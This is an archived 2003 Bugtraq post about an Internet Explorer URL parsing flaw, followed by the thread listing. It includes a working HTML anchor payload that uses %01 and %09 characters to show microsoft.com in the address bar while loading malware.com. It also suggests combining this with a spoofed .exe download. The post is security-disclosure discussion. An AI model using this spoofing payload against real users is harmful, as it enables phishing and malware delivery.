Bugtraq mailing list archives

RE: Internet Explorer URL parsing vulnerability

From: "http-equiv () excite com" <1 () malware com>
Date: Tue, 9 Dec 2003 22:52:06 -0000



The following works on Outlook Express 6 latest everything. Running 
on XP.

http://cert.uni-stuttgart.de/archive/bugtraq/2003/07/msg00249.html

09% pushes malware.com out of sight in the task bar, and %01 leaves 
microsoft.com intact in the address bar:

<A 
href="http://www.microsoft.com%01%09%09%09%09%09%09%
09 () www malware com">religious 
software</A>

Certainly will add a new flavour to the ever increasing methods of 
trickery. Now all we need to do is spoof the file download name on 
an *.exe and away we go.


-- 
http://www.malware.com

Current thread:

Re: Internet Explorer URL parsing vulnerability, (continued)
- Re: Internet Explorer URL parsing vulnerability nesumin (Dec 23)
- Re: Internet Explorer URL parsing vulnerability soulshok (Dec 09)
  - Message not available
    - Re: Internet Explorer URL parsing vulnerability Eric "MightyE" Stevens (Dec 09)
- Internet Explorer URL parsing vulnerability John W. Noerenberg II (Dec 09)
  - Re: Internet Explorer URL parsing vulnerability Pedro Castro (Dec 10)
    - Re: Internet Explorer URL parsing vulnerability William Stockall (Dec 10)
    - Re: Internet Explorer URL parsing vulnerability Andreas Plesner Jacobsen (Dec 10)
    - Re: Internet Explorer URL parsing vulnerability Charles Richmond (Dec 11)
    - Re: Internet Explorer URL parsing vulnerability Tiago Pierezan Camargo (Dec 10)
- RE: Internet Explorer URL parsing vulnerability http-equiv () excite com (Dec 10)
- RE: Internet Explorer URL parsing vulnerability http-equiv () excite com (Dec 10)
- RE: Internet Explorer URL parsing vulnerability Lance James (Dec 10)
- RE: Internet Explorer URL parsing vulnerability Mimmus (Dec 11)